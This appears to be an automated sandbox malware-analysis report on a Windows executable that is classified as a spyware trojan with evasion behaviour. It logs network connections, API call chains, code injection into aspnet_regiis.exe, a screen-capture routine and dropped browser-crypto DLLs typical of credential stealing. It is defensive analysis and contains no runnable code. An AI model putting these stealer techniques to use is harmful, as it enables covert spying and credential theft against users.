                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49729 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_00411F55

                          System Summary

                          barindex
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name: n@G>6P
                          PE file has nameless sections
                          Source: file.exeStatic PE information: section name:
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F9610 GetModuleHandleW,NtQueryInformationProcess,0_2_6E7F9610
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,3_2_0040145B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C7FB700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FB8C0 rand_s,NtQueryVirtualMemory,3_2_6C7FB8C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6C7FB910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C79F280
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F96100_2_6E7F9610
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F75100_2_6E7F7510
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F9DF00_2_6E7F9DF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E805EB00_2_6E805EB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E805AC00_2_6E805AC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8022E00_2_6E8022E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E801EF00_2_6E801EF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E802A000_2_6E802A00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E806A100_2_6E806A10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8082200_2_6E808220
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80AB900_2_6E80AB90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8057900_2_6E805790
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E801BB00_2_6E801BB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F53400_2_6E7F5340
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8017D00_2_6E8017D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E804F100_2_6E804F10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E803B400_2_6E803B40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8078900_2_6E807890
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8044A00_2_6E8044A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F9C200_2_6E7F9C20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8010E00_2_6E8010E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E802CE00_2_6E802CE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8084F00_2_6E8084F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8048000_2_6E804800
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8054100_2_6E805410
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F8CC00_2_6E7F8CC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8061B00_2_6E8061B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8185150_2_6E818515
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80B1400_2_6E80B140
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8065500_2_6E806550
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8031500_2_6E803150
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8095600_2_6E809560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041C4723_2_0041C472
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042D9333_2_0042D933
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042D1C33_2_0042D1C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042D5613_2_0042D561
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041950A3_2_0041950A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042DD1B3_2_0042DD1B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042CD2E3_2_0042CD2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041B7123_2_0041B712
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7935A03_2_6C7935A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A54403_2_6C7A5440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D5C103_2_6C7D5C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E2C103_2_6C7E2C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80AC003_2_6C80AC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D6CF03_2_6C7D6CF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79D4E03_2_6C79D4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BD4D03_2_6C7BD4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80542B3_2_6C80542B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A64C03_2_6C7A64C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80545C3_2_6C80545C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F34A03_2_6C7F34A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FC4A03_2_6C7FC4A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A6C803_2_6C7A6C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BED103_2_6C7BED10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C05123_2_6C7C0512
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AFD003_2_6C7AFD00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F85F03_2_6C7F85F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D0DD03_2_6C7D0DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79C6703_2_6C79C670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B9E503_2_6C7B9E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D3E503_2_6C7D3E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E2E4E3_2_6C7E2E4E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B46403_2_6C7B4640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F9E303_2_6C7F9E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8076E33_2_6C8076E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D7E103_2_6C7D7E10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E56003_2_6C7E5600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79BEF03_2_6C79BEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AFEF03_2_6C7AFEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F4EA03_2_6C7F4EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C806E633_2_6C806E63
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B5E903_2_6C7B5E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FE6803_2_6C7FE680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D77103_2_6C7D7710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A9F003_2_6C7A9F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C6FF03_2_6C7C6FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79DFE03_2_6C79DFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E77A03_2_6C7E77A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DF0703_2_6C7DF070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B88503_2_6C7B8850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BD8503_2_6C7BD850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8050C73_2_6C8050C7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DB8203_2_6C7DB820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E48203_2_6C7E4820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A78103_2_6C7A7810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BC0E03_2_6C7BC0E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D58E03_2_6C7D58E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C60A03_2_6C7C60A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7EB9703_2_6C7EB970
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AD9603_2_6C7AD960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BA9403_2_6C7BA940
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CD9B03_2_6C7CD9B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79C9A03_2_6C79C9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D51903_2_6C7D5190
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F29903_2_6C7F2990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80B1703_2_6C80B170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80BA903_2_6C80BA90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D9A603_2_6C7D9A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C802AB03_2_6C802AB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B1AF03_2_6C7B1AF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DE2F03_2_6C7DE2F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D8AC03_2_6C7D8AC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7ACAB03_2_6C7ACAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7922A03_2_6C7922A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C4AA03_2_6C7C4AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AC3703_2_6C7AC370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7953403_2_6C795340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8053C83_2_6C8053C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DD3203_2_6C7DD320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79F3803_2_6C79F380
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C83ECC03_2_6C83ECC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C89ECD03_2_6C89ECD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C906C003_2_6C906C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C91AC303_2_6C91AC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C84AC603_2_6C84AC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8D6D903_2_6C8D6D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C844DB03_2_6C844DB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C9CCDC03_2_6C9CCDC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C9C8D203_2_6C9C8D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C96AD503_2_6C96AD50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C90ED703_2_6C90ED70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8C6E903_2_6C8C6E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C84AEC03_2_6C84AEC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8E0EC03_2_6C8E0EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C920E203_2_6C920E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8DEE703_2_6C8DEE70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C988FB03_2_6C988FB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C84EFB03_2_6C84EFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C91EFF03_2_6C91EFF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C840FE03_2_6C840FE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C846F103_2_6C846F10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C980F203_2_6C980F20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8AEF403_2_6C8AEF40
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6E80C370 appears 33 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C7D94D0 appears 90 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C7CCBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004104E7 appears 36 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C9C09D0 appears 51 times
                          Source: file.exeStatic PE information: invalid certificate
                          Source: file.exe, 00000000.00000002.2145053280.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: file.exe, 00000000.00000000.2126154485.0000000000AF4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHusbandPlayerEleanor681Grace.NTxu@ vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameHusbandPlayerEleanor681Grace.NTxu@ vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: n@G>6P ZLIB complexity 1.00033367083947
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/24@1/3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C7F7030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,3_2_00411807
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
